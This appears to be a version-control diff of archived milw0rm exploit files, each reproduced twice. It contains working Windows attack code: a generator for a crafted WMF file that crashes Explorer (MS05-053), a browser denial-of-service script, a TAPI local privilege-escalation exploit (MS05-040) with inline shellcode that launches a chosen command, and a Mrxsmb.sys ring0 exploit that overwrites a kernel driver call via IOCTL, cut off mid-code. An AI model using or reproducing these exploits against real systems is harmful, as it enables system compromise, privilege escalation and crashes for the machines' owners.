"\x00\x00\x2d\x01\x00\x00\x04\x00\x00\x00\x2d\x01\x01\x00\x04\x00"
"\x00\x00\x06\x01\x01\x00\x14\x00\x00\x00\x24\x03\x08\x00\xc6\xfb"
"\x9b\x03\xbc\xfe\x9b\x03\x0f\x01\x1a\x07\xa5\x02\x1a\x07\xf4\x00"
"\x39\x09\xd5\xfc\x36\x07\x86\xfe\x36\x07\xc6\xfb\x9b\x03\x04\x00"
"\x00\x00\x2d\x01\x02\x00\x04\x00\x00\x00\x2d\x01\x03\x00\x04\x00"
"\x00\x00\xf0\x01\x00\x00\x03\x00";
unsigned char wmfeof[] =
"\x00\x00\x00\x00";
int main(int argc, char *argv[])
{
FILE *fp;
int metafilesizeW, recordsizeW;
char wmfbuf[2048];
int metafilesize, recordsize, i, j;
metafilesize = sizeof (wmfheader) + sizeof (metafileRECORD) + sizeof(wmfeof) -3;
metafilesizeW = metafilesize/2;
recordsize = sizeof (metafileRECORD) -1;
recordsizeW = recordsize/2;
memcpy((unsigned long *)&wmfheader[28], &metafilesize, 4);
memcpy((unsigned long *)&wmfheader[34], &recordsizeW, 4);
printf("[*] Adding Metafile header\n");
for (i = 0; i < sizeof(wmfheader) -1; i++) {
(unsigned char)wmfbuf[i] = (unsigned char)wmfheader[i];
}
printf("[*] Adding metafile records\n");
for (j = i, i = 0; i < sizeof(metafileRECORD) -1; i++, j++) {
wmfbuf[j] = metafileRECORD[i];
}
printf("[*] Setting EOF\n");
for (i = 0; i < sizeof(wmfeof) -1; i++, j++) {
wmfbuf[j] = wmfeof[i];
}
printf("[*] Creating Metafile (MS053.wmf)\n");
fp = fopen("MS053.wmf", "wb");
fwrite(wmfbuf, 1, metafilesize, fp);
fclose(fp);
}
// milw0rm.com [2005-11-30]
/*
* Author: Winny Thomas
* Pune, INDIA
*
* The crafted metafile (WMF) from this code when viewed in explorer crashes it. The issue is seen
* when the field 'mtNoObjects' in the Metafile header is set to 0x0000.
* The code was tested on Windows 2000 server SP4. The issue does not occur with the
* hotfix for GDI (MS05-053) installed.
*
* Disclaimer: This code is for educational/testing purposes by authorized persons on
* networks/systems setup for such a purpose. The author of this code shall not bear
* any responsibility for any damage caused by using this code.
*
*/
#include <stdio.h>
unsigned char wmfheader[] =
"\xd7\xcd\xc6\x9a\x00\x00\xc6\xfb\xca\x02\xaa\x02\x39\x09\xe8\x03"
"\x00\x00\x00\x00\x66\xa6"
"\x01\x00" //mtType
"\x09\x00" //mtHeaderSize
"\x00\x03" //mtVersion
"\xff\xff\xff\x7f" //mtSize
"\x00\x00" //mtNoObjects
"\xff\xff\xff\xff" //mtMaxRecord
"\x00\x00";
unsigned char metafileRECORD[] =
"\x05\x00\x00\x00\x0b\x02\x39\x09\xc6\xfb\x05\x00\x00\x00\x0c\x02"
"\x91\xf9\xe4\x06\x04\x00\x00\x00\x06\x01\x01\x00\x07\x00\x00\x00"
"\xfc\x02\x00\x00\x0e\x0d\x0d\x00\x00\x00\x04\x00\x00\x00\x2d\x01"
"\x00\x00\x08\x00\x00\x00\xfa\x02"
"\x05\x00\x00\x00\x00\x00\xff\xff\xff\x00\x04\x00\x00\x00\x2d\x01"
"\x01\x00\x04\x00\x00\x00\x06\x01\x01\x00\x14\x00\x00\x00\x24\x03"
"\x08\x00\xc6\xfb\xca\x02\xbc\xfe\xca\x02\x0f\x01\x49\x06\xa5\x02"
"\x49\x06\xf4\x00\x68\x08\xd5\xfc\x65\x06\x86\xfe\x65\x06\xc6\xfb"
"\xca\x02\x08\x00\x00\x00\xfa\x02\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x04\x00\x00\x00\x2d\x01\x02\x00\x07\x00\x00\x00\xfc\x02"
"\x00\x00\xff\xff\xff\x00\x00\x00\x04\x00\x00\x00\x2d\x01\x03\x00"
"\x04\x00\x00\x00\xf0\x01\x00\x00\x07\x00\x00\x00\xfc\x02\x00\x00"
"\xbd\x34\x30\x00\x00\x00\x04\x00\x00\x00\x2d\x01\x00\x00\x04\x00"
"\x00\x00\x2d\x01\x01\x00\x04\x00\x00\x00\x06\x01\x01\x00\x0e\x00"
"\x00\x00\x24\x03\x05\x00\xd5\xfc\x36\x07\xda\xfc\xd1\x06\x8b\xfe"
"\xd1\x06\x86\xfe\x36\x07\xd5\xfc\x36\x07\x04\x00\x00\x00\x2d\x01"
"\x02\x00\x04\x00\x00\x00\x2d\x01\x03\x00\x04\x00\x00\x00\xf0\x01"
"\x00\x00\x07\x00\x00\x00\xfc\x02\x00\x00\xbd\x34\x30\x00\x00\x00"
"\x04\x00\x00\x00\x2d\x01\x00\x00\x04\x00\x00\x00\x2d\x01\x01\x00"
"\x04\x00\x00\x00\x06\x01\x01\x00\x0e\x00\x00\x00\x24\x03\x05\x00"
"\xc6\xfb\x9b\x03\xcb\xfb\x36\x03\xc1\xfe\x36\x03\xbc\xfe\x9b\x03"
"\xc6\xfb\x9b\x03\x04\x00\x00\x00\x2d\x01\x02\x00\x04\x00\x00\x00"
"\x2d\x01\x03\x00\x04\x00\x00\x00\xf0\x01\x00\x00\x07\x00\x00\x00"
"\xfc\x02\x00\x00\xfb\x4e\x55\x00\x00\x00\x04\x00\x00\x00\x2d\x01"
"\x00\x00\x04\x00\x00\x00\x2d\x01\x01\x00\x04\x00\x00\x00\x06\x01"
"\x01\x00\x0e\x00\x00\x00\x24\x03\x05\x00\xbc\xfe\x9b\x03\xc1\xfe"
"\x36\x03\x14\x01\xb5\x06\x0f\x01\x1a\x07\xbc\xfe\x9b\x03\x04\x00"
"\x00\x00\x2d\x01\x02\x00\x04\x00\x00\x00\x2d\x01\x03\x00\x04\x00"
"\x00\x00\xf0\x01\x00\x00\x07\x00\x00\x00\xfc\x02\x00\x00\xbd\x34"
"\x30\x00\x00\x00\x04\x00\x00\x00\x2d\x01\x00\x00\x04\x00\x00\x00"
"\x2d\x01\x01\x00\x04\x00\x00\x00\x06\x01\x01\x00\x0e\x00\x00\x00"
"\x24\x03\x05\x00\x0f\x01\x1a\x07\x14\x01\xb5\x06\xaa\x02\xb5\x06"
"\xa5\x02\x1a\x07\x0f\x01\x1a\x07\x04\x00\x00\x00\x2d\x01\x02\x00"
"\x04\x00\x00\x00\x2d\x01\x03\x00\x04\x00\x00\x00\xf0\x01\x00\x00"
"\x07\x00\x00\x00\xfc\x02\x00\x00\xfa\x94\x93\x00\x00\x00\x04\x00"
"\x00\x00\x2d\x01\x00\x00\x04\x00\x00\x00\x2d\x01\x01\x00\x04\x00"
"\x00\x00\x06\x01\x01\x00\x14\x00\x00\x00\x24\x03\x08\x00\xc6\xfb"
"\x9b\x03\xbc\xfe\x9b\x03\x0f\x01\x1a\x07\xa5\x02\x1a\x07\xf4\x00"
"\x39\x09\xd5\xfc\x36\x07\x86\xfe\x36\x07\xc6\xfb\x9b\x03\x04\x00"
"\x00\x00\x2d\x01\x02\x00\x04\x00\x00\x00\x2d\x01\x03\x00\x04\x00"
"\x00\x00\xf0\x01\x00\x00\x03\x00";
unsigned char wmfeof[] =
"\x00\x00\x00\x00";
int main(int argc, char *argv[])
{
FILE *fp;
int metafilesizeW, recordsizeW;
char wmfbuf[2048];
int metafilesize, recordsize, i, j;
metafilesize = sizeof (wmfheader) + sizeof (metafileRECORD) + sizeof(wmfeof) -3;
metafilesizeW = metafilesize/2;
recordsize = sizeof (metafileRECORD) -1;
recordsizeW = recordsize/2;
memcpy((unsigned long *)&wmfheader[28], &metafilesize, 4);
memcpy((unsigned long *)&wmfheader[34], &recordsizeW, 4);
printf("[*] Adding Metafile header\n");
for (i = 0; i < sizeof(wmfheader) -1; i++) {
(unsigned char)wmfbuf[i] = (unsigned char)wmfheader[i];
}
printf("[*] Adding metafile records\n");
for (j = i, i = 0; i < sizeof(metafileRECORD) -1; i++, j++) {
wmfbuf[j] = metafileRECORD[i];
}
printf("[*] Setting EOF\n");
for (i = 0; i < sizeof(wmfeof) -1; i++, j++) {
wmfbuf[j] = wmfeof[i];
}
printf("[*] Creating Metafile (MS053.wmf)\n");
fp = fopen("MS053.wmf", "wb");
fwrite(wmfbuf, 1, metafilesize, fp);
fclose(fp);
}
// milw0rm.com [2005-11-30]

4
platforms/windows/dos/1838.html
View file

@ -20,5 +20,5 @@
</del>
</h2>
</dir>
</ul>
# milw0rm.com [2006-05-27]
</ul>
# milw0rm.com [2006-05-27]

6
platforms/windows/dos/931.html
View file

@ -14,6 +14,6 @@
<SCRIPT>
try{window.open().document.appendChild(document.all[0]);}catch(e){}
</SCRIPT>
# milw0rm.com [2005-04-12]
</SCRIPT>
# milw0rm.com [2005-04-12]

6
platforms/windows/dos/942.c
View file

@ -139,6 +139,6 @@ void banner()
"\t\t Yuri Gushin <yuri@eclipse.org.il>\n"
"\t\t Alex Behar <alex@eclipse.org.il>\n"
"\t\t\t ECL Team\n\n\n");
}
// milw0rm.com [2005-04-17]
}
// milw0rm.com [2005-04-17]

630
platforms/windows/local/1584.cpp
View file

@ -1,315 +1,315 @@
// by Cesar Cerrudo - Argeniss - www.argeniss.com
//
// TAPI Vulnerability- MS05-040
//
// Should work on Win2k sp0,sp1,sp2,sp3,sp4 any language
// If Telephony Service is not running you can start it by net start "Telephony Service"
#include "windows.h"
#include "stdio.h"
#include "tapi.h"
typedef struct _UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING;
typedef struct LpcSectionMapInfo{
DWORD Length;
DWORD SectionSize;
DWORD ServerBaseAddress;
} LPCSECTIONMAPINFO;
typedef struct LpcSectionInfo {
DWORD Length;
HANDLE SectionHandle;
DWORD Param1;
DWORD SectionSize;
DWORD ClientBaseAddress;
DWORD ServerBaseAddress;
} LPCSECTIONINFO;
#define SHARED_SECTION_SIZE 0x1000
typedef struct _OBJDIR_INFORMATION {
UNICODE_STRING ObjectName;
UNICODE_STRING ObjectTypeName;
BYTE Data[1];
} OBJDIR_INFORMATION;
typedef struct _OBJECT_ATTRIBUTES {
ULONG Length;
HANDLE RootDirectory;
UNICODE_STRING *ObjectName;
ULONG Attributes;
PVOID SecurityDescriptor;
PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES;
#define InitializeObjectAttributes( p, n, a, r, s ) { \
(p)->Length = sizeof( OBJECT_ATTRIBUTES ); \
(p)->RootDirectory = r; \
(p)->Attributes = a; \
(p)->ObjectName = n; \
(p)->SecurityDescriptor = s; \
(p)->SecurityQualityOfService = NULL; \
}
WCHAR * uString=(WCHAR *) HeapAlloc(GetProcessHeap(), 0, 0x100);
LPVOID lpLocalAddress,lpTargetAddress;
DWORD ConnectToLPCPort(){
HMODULE hNtdll;
HANDLE hPort;
LPCSECTIONINFO sectionInfo;
LPCSECTIONMAPINFO mapInfo;
byte ConnectDataBuffer[100];
DWORD Size = sizeof(ConnectDataBuffer);
WCHAR * uString=L"\\RPC Control\\tapsrvlpc";//TAPI LPC port
DWORD i;
UNICODE_STRING uStr;
for (i=0;i<100;i++)
ConnectDataBuffer[i]=0x0;
hNtdll=LoadLibrary("ntdll.dll");
DWORD (WINAPI * pfnNtConnectPort)(HANDLE*,UNICODE_STRING * ,SECURITY_QUALITY_OF_SERVICE*,DWORD*,DWORD*,DWORD*,DWORD*,DWORD*);
pfnNtConnectPort= (DWORD (WINAPI *)(HANDLE* ,UNICODE_STRING *,SECURITY_QUALITY_OF_SERVICE*,DWORD*,DWORD*,DWORD*,DWORD*,DWORD*))GetProcAddress(hNtdll,"NtConnectPort");
DWORD (WINAPI * pfnCreateSection)(HANDLE* ,DWORD,DWORD,PLARGE_INTEGER,DWORD,DWORD,DWORD);
pfnCreateSection= (DWORD (WINAPI *)(HANDLE* ,DWORD,DWORD,PLARGE_INTEGER,DWORD,DWORD,DWORD))GetProcAddress(hNtdll,"NtCreateSection");
HANDLE hSection;
LARGE_INTEGER SecSize;
DWORD maxSize=0;
SecSize.LowPart=0x1000;
SecSize.HighPart=0x0;
SECURITY_QUALITY_OF_SERVICE qos;
DWORD qosSize=4;
qos.Length =(DWORD)&qosSize;
qos.ImpersonationLevel =(_SECURITY_IMPERSONATION_LEVEL)0x2;
qos.ContextTrackingMode =0x01000101;
qos.EffectiveOnly =0x10000;
//create shared section
pfnCreateSection(&hSection,SECTION_ALL_ACCESS,NULL,&SecSize,PAGE_READWRITE,SEC_COMMIT ,NULL);
memset(&sectionInfo, 0, sizeof(sectionInfo));
memset(&mapInfo, 0, sizeof(mapInfo));
sectionInfo.Length = 0x18;
sectionInfo.SectionHandle =hSection;
sectionInfo.SectionSize = SHARED_SECTION_SIZE;
mapInfo.Length = 0x0C;
uStr.Length = wcslen(uString)*2;
uStr.MaximumLength = wcslen(uString)*2+2;
uStr.Buffer =uString;
//connect to LPC port
if (!pfnNtConnectPort(&hPort,&uStr,&qos,(DWORD *)&sectionInfo,(DWORD *)&mapInfo,&maxSize,(DWORD*)ConnectDataBuffer,&Size)){
lpLocalAddress =(LPVOID)sectionInfo.ClientBaseAddress ;
lpTargetAddress =(LPVOID)sectionInfo.ServerBaseAddress ;
return 1;
}
return 0;
}
int main(int argc, char* argv[])
{
HMODULE hKernel;
DWORD iStrLen;
FARPROC pWinExec,pExitThread;
LPSTR sCommand;
if (!argv[1]) {
printf("\nUsage :\n TapiExploit \"command\" \n");
printf("\nExample :\n TapiExploit \"cmd.exe\" \n");
exit(0);
}
iStrLen=strlen(argv[1]);
if(iStrLen>=65){
printf("\n\"command\" must be less than 65 chars.\n");
exit(0);
}
sCommand=argv[1];
if (!ConnectToLPCPort()){ //connect to TAPI LPC port
printf("Could not connect to LPC port \nTAPI service couldn't be running\nTry again.");
exit(0);
}
hKernel=LoadLibrary("Kernel32.dll");
// pWinExec=GetProcAddress(hKernel,"WinExec");
pWinExec=GetProcAddress(hKernel,"CreateProcessA");
pExitThread=GetProcAddress(hKernel,"ExitThread");
CHAR sWinSta[]="WinSta0\\Default";
//copy shellcode
_asm {
pushad
lea esi, Shellcode
mov edi, lpLocalAddress
add edi, 0x10
lea ecx, End
sub ecx, esi
push esi
push edi
cld
rep movsb
pop edi
pop esi
push edi
lea ecx, CommandBuf
sub ecx, esi
add edi, ecx
mov esi, sCommand
mov ecx, iStrLen
rep movsb
mov [edi], 0x00
pop edi
mov esi, pWinExec
mov [edi+0x0a], esi
mov esi, pExitThread
mov [edi+0x0e], esi
//////////////
add edi, 0x2f0
lea esi, sWinSta
mov ecx, 0xf
cld
rep movsb
///////////////
jmp Done
Shellcode:
jmp Start
// this gets overwritten
mov ax,0xffff
mov ax,0xffff
mov ax,0xffff
mov ax,0xffff
CommandBuf: // this gets overwritten
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
Start:
call getDelta
getDelta:
pop edx // Get shellcode/shared section pointer
push edx
/* push 0x1 // push 0x0 for hidden window
lea eax, [edx-0x47]
push eax // Command offset
call [edx-0x4f] // Call WinExec
*/
mov eax, edx
add eax,0x500
push eax //LPPROCESS_INFORMATION
add eax, 0x100
mov ebx, edx
xor bl, bl
lea ecx, [ebx+0x300]
lea ebx, [eax+0x8]
mov [ebx], ecx //set windows station and desktop
push eax //LPSTARTUPINFO
push 0x0
push 0x0
push 0x0
push 0x0
push 0x0
push 0x0
lea eax, [edx-0x47]
push eax // Command offset
push 0x0
call [edx-0x4f] // Call create process
pop edx
call [edx-0x4b] // Call ExitThread
End:
Done:
popad
}
LPSTR lpszAppFilename=(LPSTR )HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 0x21C) ;
LINEEXTENSIONID ExtensionID;
memset(lpszAppFilename,0x58,0x21A);
_asm{
pushad
mov ebx, lpszAppFilename
lea ebx, [ebx+0x216]
mov eax, lpTargetAddress
add eax, 0x10
mov [ebx], eax
popad
}
lineSetAppPriorityW((LPWSTR )lpszAppFilename,NULL,&ExtensionID,LINEREQUESTMODE_MAKECALL,NULL,NULL);
Sleep(1000);
printf("Command should have been executed ;)\n");
return 0;
}
// milw0rm.com [2006-03-14]
// by Cesar Cerrudo - Argeniss - www.argeniss.com
//
// TAPI Vulnerability- MS05-040
//
// Should work on Win2k sp0,sp1,sp2,sp3,sp4 any language
// If Telephony Service is not running you can start it by net start "Telephony Service"
#include "windows.h"
#include "stdio.h"
#include "tapi.h"
typedef struct _UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING;
typedef struct LpcSectionMapInfo{
DWORD Length;
DWORD SectionSize;
DWORD ServerBaseAddress;
} LPCSECTIONMAPINFO;
typedef struct LpcSectionInfo {
DWORD Length;
HANDLE SectionHandle;
DWORD Param1;
DWORD SectionSize;
DWORD ClientBaseAddress;
DWORD ServerBaseAddress;
} LPCSECTIONINFO;
#define SHARED_SECTION_SIZE 0x1000
typedef struct _OBJDIR_INFORMATION {
UNICODE_STRING ObjectName;
UNICODE_STRING ObjectTypeName;
BYTE Data[1];
} OBJDIR_INFORMATION;
typedef struct _OBJECT_ATTRIBUTES {
ULONG Length;
HANDLE RootDirectory;
UNICODE_STRING *ObjectName;
ULONG Attributes;
PVOID SecurityDescriptor;
PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES;
#define InitializeObjectAttributes( p, n, a, r, s ) { \
(p)->Length = sizeof( OBJECT_ATTRIBUTES ); \
(p)->RootDirectory = r; \
(p)->Attributes = a; \
(p)->ObjectName = n; \
(p)->SecurityDescriptor = s; \
(p)->SecurityQualityOfService = NULL; \
}
WCHAR * uString=(WCHAR *) HeapAlloc(GetProcessHeap(), 0, 0x100);
LPVOID lpLocalAddress,lpTargetAddress;
DWORD ConnectToLPCPort(){
HMODULE hNtdll;
HANDLE hPort;
LPCSECTIONINFO sectionInfo;
LPCSECTIONMAPINFO mapInfo;
byte ConnectDataBuffer[100];
DWORD Size = sizeof(ConnectDataBuffer);
WCHAR * uString=L"\\RPC Control\\tapsrvlpc";//TAPI LPC port
DWORD i;
UNICODE_STRING uStr;
for (i=0;i<100;i++)
ConnectDataBuffer[i]=0x0;
hNtdll=LoadLibrary("ntdll.dll");
DWORD (WINAPI * pfnNtConnectPort)(HANDLE*,UNICODE_STRING * ,SECURITY_QUALITY_OF_SERVICE*,DWORD*,DWORD*,DWORD*,DWORD*,DWORD*);
pfnNtConnectPort= (DWORD (WINAPI *)(HANDLE* ,UNICODE_STRING *,SECURITY_QUALITY_OF_SERVICE*,DWORD*,DWORD*,DWORD*,DWORD*,DWORD*))GetProcAddress(hNtdll,"NtConnectPort");
DWORD (WINAPI * pfnCreateSection)(HANDLE* ,DWORD,DWORD,PLARGE_INTEGER,DWORD,DWORD,DWORD);
pfnCreateSection= (DWORD (WINAPI *)(HANDLE* ,DWORD,DWORD,PLARGE_INTEGER,DWORD,DWORD,DWORD))GetProcAddress(hNtdll,"NtCreateSection");
HANDLE hSection;
LARGE_INTEGER SecSize;
DWORD maxSize=0;
SecSize.LowPart=0x1000;
SecSize.HighPart=0x0;
SECURITY_QUALITY_OF_SERVICE qos;
DWORD qosSize=4;
qos.Length =(DWORD)&qosSize;
qos.ImpersonationLevel =(_SECURITY_IMPERSONATION_LEVEL)0x2;
qos.ContextTrackingMode =0x01000101;
qos.EffectiveOnly =0x10000;
//create shared section
pfnCreateSection(&hSection,SECTION_ALL_ACCESS,NULL,&SecSize,PAGE_READWRITE,SEC_COMMIT ,NULL);
memset(&sectionInfo, 0, sizeof(sectionInfo));
memset(&mapInfo, 0, sizeof(mapInfo));
sectionInfo.Length = 0x18;
sectionInfo.SectionHandle =hSection;
sectionInfo.SectionSize = SHARED_SECTION_SIZE;
mapInfo.Length = 0x0C;
uStr.Length = wcslen(uString)*2;
uStr.MaximumLength = wcslen(uString)*2+2;
uStr.Buffer =uString;
//connect to LPC port
if (!pfnNtConnectPort(&hPort,&uStr,&qos,(DWORD *)&sectionInfo,(DWORD *)&mapInfo,&maxSize,(DWORD*)ConnectDataBuffer,&Size)){
lpLocalAddress =(LPVOID)sectionInfo.ClientBaseAddress ;
lpTargetAddress =(LPVOID)sectionInfo.ServerBaseAddress ;
return 1;
}
return 0;
}
int main(int argc, char* argv[])
{
HMODULE hKernel;
DWORD iStrLen;
FARPROC pWinExec,pExitThread;
LPSTR sCommand;
if (!argv[1]) {
printf("\nUsage :\n TapiExploit \"command\" \n");
printf("\nExample :\n TapiExploit \"cmd.exe\" \n");
exit(0);
}
iStrLen=strlen(argv[1]);
if(iStrLen>=65){
printf("\n\"command\" must be less than 65 chars.\n");
exit(0);
}
sCommand=argv[1];
if (!ConnectToLPCPort()){ //connect to TAPI LPC port
printf("Could not connect to LPC port \nTAPI service couldn't be running\nTry again.");
exit(0);
}
hKernel=LoadLibrary("Kernel32.dll");
// pWinExec=GetProcAddress(hKernel,"WinExec");
pWinExec=GetProcAddress(hKernel,"CreateProcessA");
pExitThread=GetProcAddress(hKernel,"ExitThread");
CHAR sWinSta[]="WinSta0\\Default";
//copy shellcode
_asm {
pushad
lea esi, Shellcode
mov edi, lpLocalAddress
add edi, 0x10
lea ecx, End
sub ecx, esi
push esi
push edi
cld
rep movsb
pop edi
pop esi
push edi
lea ecx, CommandBuf
sub ecx, esi
add edi, ecx
mov esi, sCommand
mov ecx, iStrLen
rep movsb
mov [edi], 0x00
pop edi
mov esi, pWinExec
mov [edi+0x0a], esi
mov esi, pExitThread
mov [edi+0x0e], esi
//////////////
add edi, 0x2f0
lea esi, sWinSta
mov ecx, 0xf
cld
rep movsb
///////////////
jmp Done
Shellcode:
jmp Start
// this gets overwritten
mov ax,0xffff
mov ax,0xffff
mov ax,0xffff
mov ax,0xffff
CommandBuf: // this gets overwritten
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
Start:
call getDelta
getDelta:
pop edx // Get shellcode/shared section pointer
push edx
/* push 0x1 // push 0x0 for hidden window
lea eax, [edx-0x47]
push eax // Command offset
call [edx-0x4f] // Call WinExec
*/
mov eax, edx
add eax,0x500
push eax //LPPROCESS_INFORMATION
add eax, 0x100
mov ebx, edx
xor bl, bl
lea ecx, [ebx+0x300]
lea ebx, [eax+0x8]
mov [ebx], ecx //set windows station and desktop
push eax //LPSTARTUPINFO
push 0x0
push 0x0
push 0x0
push 0x0
push 0x0
push 0x0
lea eax, [edx-0x47]
push eax // Command offset
push 0x0
call [edx-0x4f] // Call create process
pop edx
call [edx-0x4b] // Call ExitThread
End:
Done:
popad
}
LPSTR lpszAppFilename=(LPSTR )HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 0x21C) ;
LINEEXTENSIONID ExtensionID;
memset(lpszAppFilename,0x58,0x21A);
_asm{
pushad
mov ebx, lpszAppFilename
lea ebx, [ebx+0x216]
mov eax, lpTargetAddress
add eax, 0x10
mov [ebx], eax
popad
}
lineSetAppPriorityW((LPWSTR )lpszAppFilename,NULL,&ExtensionID,LINEREQUESTMODE_MAKECALL,NULL,NULL);
Sleep(1000);
printf("Command should have been executed ;)\n");
return 0;
}
// milw0rm.com [2006-03-14]

464
platforms/windows/local/1911.c
View file

@ -1,232 +1,232 @@
///////////////////////////////////////////////////////////////////////////////////////
// Mrxsmb.sys XP & 2K Ring0 Exploit (6/12/2005)
// Tested on XP SP2 && 2K SP4
// Disable ReadOnly Memory protection
// HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\EnforceWriteProtection = 0
// -----------------------------------------------------------------------------------
// ONLY FOR EDUCATIONAL PURPOSES.
// -----------------------------------------------------------------------------------
// Rubén Santamarta.
// www.reversemode.com
// -----------------------------------------------------------------------------------
// OVERVIEW
// -----------------------------------------------------------------------------------
// There are 3 possible values to change in order to adjust the exploit to other versions.
// # XPSP2 (XP Service Pack 2)
// This variable is equal to the File offset of the Call that we are modifying minus 0xC
//. #XPSP2 => 3D88020000 cmp eax,000000288
//. 770B ja .000064BBE --
//. 50 push eax
//. 51 push ecx
//. E812E2FFFF call .000062DCC -- MODIFIED CALL --
// -----------------------------------------------------------------------------------
// #W2KSP4 (Windows 2000 Service Pack 4)
// The same method previosly explained but regarding to Windows 2000 Service Pack 4.
// -----------------------------------------------------------------------------------
// $OffWord
// This variable is defined in CalcJump() Function.
// E812E2FFFF call .000062DCC -- MODIFIED CALL --
// The exploit calculates automatically the relative jump, but we need to provide it
// the 2 bytes following opcode Call(0xE8). In example, as we can see, to test in XP
// OffWord will be equal to 0xE212.
//////////////////////////////////////////////////////////////////////////////////////
#include <windows.h>
#include <stdio.h>
#define XPSP2 0x54BAC
#define W2KSP4 0x50ADD
#define MAGIC_IOCTL 0x141043
typedef BOOL (WINAPI *PENUMDEVICES)(LPVOID*,
DWORD ,
LPDWORD);
typedef DWORD (WINAPI *PGETDEVNAME)(LPVOID ImageBase,
LPTSTR lpBaseName,
DWORD nSize);
VOID ShowError()
{
LPVOID lpMsgBuf;
FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER| FORMAT_MESSAGE_FROM_SYSTEM,
NULL,
GetLastError(),
MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
(LPTSTR) &lpMsgBuf,
0,
NULL);
MessageBoxA(0,(LPTSTR)lpMsgBuf,"Error",0);
exit(1);
}
DWORD CalcJump(DWORD BaseMRX,BOOL InXP,DWORD *hValue,DWORD *ShellAddr)
{
DWORD SumTemp;
DWORD IniAddress;
DWORD i;
DWORD sumAux;
DWORD addTemp;
DWORD OffWord;
if(InXP)
{
SumTemp=BaseMRX+XPSP2+0xE;
OffWord=0xE212;
}
else
{
SumTemp=BaseMRX+W2KSP4+0xE;
OffWord=0xa971;
}
for(i=0x4c;i<0xDDDC;i=i+4)
{
sumAux=~((i*0x10000)+OffWord);
addTemp=SumTemp-sumAux;
if(addTemp>0xE000000 && addTemp<0xF000000){
IniAddress=addTemp&0xFFFFF000;
*hValue=i-4;
*ShellAddr=addTemp;
break;
}
}
printf("\nINFORMATION \n");
printf("-----------------------------------------------------\n");
printf("Patched Driver Call pointing to \t [0x%p]\n",addTemp);
return (IniAddress);
}
int main(int argc, char *argv[])
{
PENUMDEVICES pEnumDeviceDrivers;
PGETDEVNAME pGetDeviceDriverBaseName;
LPVOID arrMods[200],addEx;
DWORD cb,i,devNum,dwTemp,hValue,Ring0Addr,junk,ShellAddr,BaseMRX=0;
DWORD *OutBuff,*InBuff;
HANDLE hDevice;
BOOL InXP;
CHAR baseName[255];
CONST CHAR Ring0ShellCode[]="\xCC"; //"PUT YOUR RING0 CODE HERE :)"
if(argc<2)
{
printf("\nMRXSMB.SYS RING0 Exploit\n");
printf("--- Ruben Santamarta ---\n");
printf("Tested on XPSP2 & W2KSP4\n");
printf("\nusage> exploit.exe <XP> or <2K>\n");
exit(1);
}
if(strncmp(argv[1],"XP",2)==0)
InXP=TRUE;
else
InXP=FALSE;
pEnumDeviceDrivers=(PENUMDEVICES)GetProcAddress(LoadLibrary("psapi.dll"),
"EnumDeviceDrivers");
pGetDeviceDriverBaseName=(PGETDEVNAME)GetProcAddress(LoadLibrary("psapi.dll"),
"GetDeviceDriverBaseNameA");
pEnumDeviceDrivers(arrMods,sizeof(arrMods),&cb);
devNum=cb/sizeof(LPVOID);
printf("\nSearching Mrxsmb.sys Base Address...");
for(i=1;i<=devNum;i++)
{
pGetDeviceDriverBaseName(arrMods[i],baseName,254);
if((strncmp(baseName,"mrxsmb",6)==0))
{
printf("[%x] Found!\n",arrMods[i]);
BaseMRX=(DWORD)arrMods[i];
}
}
if(!BaseMRX)
{
printf("Not Found\nExiting\n\n");
exit(1);
}
addEx=(LPVOID)CalcJump(BaseMRX,InXP,&hValue,&ShellAddr);
OutBuff=(DWORD*)VirtualAlloc((LPVOID)addEx,0xF000,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
if(!OutBuff) ShowError();
printf("F000h bytes allocated at \t\t [0x%p]\n",addEx);
printf("Value needed \t\t\t [0x%p]\n",hValue+4);
InBuff=OutBuff;
printf("Checking Shadow Device...");
hDevice = CreateFile("\\\\.\\shadow",
FILE_EXECUTE,
FILE_SHARE_READ|FILE_SHARE_WRITE,
NULL,
OPEN_EXISTING,
0,
NULL);
if (hDevice == INVALID_HANDLE_VALUE) ShowError();
printf("[OK]\n");
printf("Querying Device...\n");
while(OutBuff[3]< hValue)
{
DeviceIoControl(hDevice, // "\\.\shadow"
MAGIC_IOCTL, // Privileged IOCTL
InBuff, 2, // InBuffer, InBufferSize
OutBuff, 0x18,// OutBuffer,OutBufferSize
&junk, // bytes returned
(LPOVERLAPPED) NULL);
printf("\r\t[->]VALUES: (%x)",OutBuff[3]);
}
if(InXP)
Ring0Addr=BaseMRX+XPSP2;
else
Ring0Addr=BaseMRX+W2KSP4;
printf("Overwritting Driver Call at[%x]...",Ring0Addr);
DeviceIoControl(hDevice, // "\\.\shadow"
MAGIC_IOCTL, // Privileged IOCTL
InBuff, 2, // InBuffer, InBufferSize
(LPVOID)Ring0Addr, 0x18,// OutBuffer,OutBufferSize 0x
&junk, // bytes returned
(LPOVERLAPPED) NULL);
printf("[OK]\n");
for(i=1;i<0x3C00;i++) OutBuff[i]=0x90909090;
memcpy((LPVOID*)ShellAddr,(LPVOID*)Ring0ShellCode,sizeof(Ring0ShellCode));
printf("Sending IOCTL to execute the ShellCode\n");
